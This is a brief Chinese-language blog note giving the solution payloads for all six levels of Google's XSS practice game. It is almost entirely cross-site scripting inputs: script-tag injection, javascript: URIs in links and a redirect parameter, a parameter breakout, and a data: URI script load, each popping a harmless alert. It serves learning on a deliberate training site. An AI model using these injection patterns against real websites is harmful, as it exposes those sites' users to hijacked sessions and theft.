HOME/Articles/

Google XSS

Article Outline

记录

谷歌 XSS 小游戏

  1. 第一关

    </b><script>alert("Borber")</script>
  2. 第二关

    <p>hello <a name="n" href="javascript:alert('Borber')"><em>Borber</em></a></p>
  3. 第三关

    https://xss-game.appspot.com/level3/frame#4'><script>alert("Borber")</script>
  4. 第四关

    https://xss-game.appspot.com/level4/frame?timer=100'),alert('Borber
  5. 第五关

    https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert("Borber")
  6. 第六关

    https://xss-game.appspot.com/level6/frame#data:text/plain,alert("Borber")